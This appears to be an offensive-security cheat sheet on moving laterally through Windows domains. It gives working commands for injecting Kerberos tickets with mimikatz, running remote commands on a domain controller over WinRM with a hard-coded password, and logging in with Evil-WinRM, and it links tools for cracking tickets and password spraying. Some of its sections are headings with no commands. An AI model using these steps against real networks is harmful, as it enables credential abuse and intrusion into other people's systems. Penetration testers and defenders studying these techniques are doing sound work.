Lateral Movement

There aren't many ways to move laterally on windows. Below are the main ones.

• psexec

• RDP

• WinRM

• SSH(not likely)

PTH(pass the hash) can be used most of the time.

Mimikatz Ticket PTT

Enable-PSRemoting
mimikatz.exe '" kerberos:ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORP

WinRM

$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }

# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp

PTH with Mimikatz

Pass The Ccache (PTC)

Grab the ccache from remote and put into environment variable

Make sure the times are synced up with the DC

Psexec to the target

** Don't include domain name in psexec. If you are having issues with the command you may remove the username as well.

Cracking Ccache

Convert the ccache file into kirbi file using a converter.

• I use https://github.com/zer1t0/ticket_converter

Convert kirbi to crackable hash.

• https://github.com/nidem/kerberoast

• https://github.com/jarilaos/kirbi2hashcat/blob/master/kirbi2hashcat.py

RDP

Impacket's rdp_check.py script is good.

CrackMapExec

Swiss-knife tool for password spraying.

• https://github.com/byt3bl33d3r/CrackMapExec